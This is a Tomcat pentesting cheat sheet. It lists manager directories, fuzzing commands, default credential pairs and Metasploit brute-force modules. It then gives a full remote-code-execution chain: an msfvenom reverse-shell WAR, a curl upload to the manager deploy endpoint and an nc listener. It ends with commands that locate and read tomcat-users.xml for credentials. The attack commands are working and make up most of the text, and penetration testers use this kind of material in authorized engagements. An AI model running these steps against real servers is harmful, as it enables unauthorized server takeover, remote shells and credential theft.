# Apache Tomcat Pentesting

Apache Tomcat is an implementation of the Jakarta Servlet, Jakarta Expression Language, and WebSocket technologies.

### Directories <a href="#directories" id="directories"></a>

Below are common directories for Apache Tomcat.

```shellscript
/examples
/examples/jsp/cal/login.html
/examples/jsp/error/error.html
/examples/jsp/snp/snoop.jsp
/examples/servlet/HelloWorldEXample
/examples/servlet/JndiServlet
/examples/servlet/RequestHeaderExample
/examples/servlet/RequestInfoExample
/examples/servlet/RequestParamExample

/host-manager

/manager
/manager/jmxproxy/?qry=STUFF
/manager/status
/manager/status/all
# We can execute commands in /manager/text/ directory
/manager/text/{command}?{parameters}
/manager/text/deploy?path=/foo
/manager/text/list
/manager/text/resources
/manager/text/serverinfo
/manager/text/vminfo
```

#### Directory Discovery <a href="#directory-discovery" id="directory-discovery"></a>

To enumerate directories automatically, use fuzzing tools.

```
ffuf -u https://example.com/FUZZ -w directories.txt
ffuf -u https://example.com/host-manager/FUZZ -w 
ffuf -u https://example.com/manager/FUZZ -w directories.txt
```

### Credentials <a href="#credentials" id="credentials"></a>

Below are common credentials for the manager app in Tomcat.

```shellscript
admin:(empty)
admin:admin
admin:password
admin:password1
admin:Password1
admin:tomcat
manager:manager
root:changethis
root:password
root:password1
root:root
root:r00t
root:toor
tomcat:(empty)
tomcat:admin
tomcat:changethis
tomcat:password
tomcat:password1
tomcat:s3cret
tomcat:tomcat
```

#### User Enumeration <a href="#user-enumeration" id="user-enumeration"></a>

```shellscript
# Metasploit
msf> use auxiliary/scanner/http/tomcat_enum
msf> set TARGETURI /manager  # depending on the website
```

#### Brute Force Credentials <a href="#brute-force-credentials" id="brute-force-credentials"></a>

```shellscript
ffuf -u https://tomcat:FUZZ@example.com/manager -w passwords.txt -fs 140

# Metasploit
msf> use auxiliary/scanner/http/tomcat_mgr_login
msf> set VHOST example.local
msf> set stop_on_success true
msf> set username tomcat
msf> set RHOSTS <target-ip>
```

### Remote Code Execution (RCE) <a href="#remote-code-execution-rce" id="remote-code-execution-rce"></a>

#### Using Metasploit <a href="#using-metasploit" id="using-metasploit"></a>

```shellscript
msfconsole
msf> use exploit/multi/http/tomcat_mgr_upload
```

#### Uploading WAR file (Reverse Shell) <a href="#uploading-war-file-reverse-shell" id="uploading-war-file-reverse-shell"></a>

First create a war file using Msfvenom.

```shellscript
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<local-ip> LPORT=80 -f war -o shell.war
```

Then upload this file.

```shellscript
curl --upload-file shell.war -u 'tomcat:password' "https://example.com/manager/text/deploy?path=/shell"
```

Start a listener in local machine.

```shellscript
sudo nc -lvnp 80
```

Now access to `https://example.com/shell`.

We should get a shell.

### Investigation From Inside <a href="#investigation-from-inside" id="investigation-from-inside"></a>

If we are in the target system, we can retrieve information about credentials.

```shellscript
find / -name "tomcat-users.xml" 2>/dev/null
cat tomcat-users.xml
```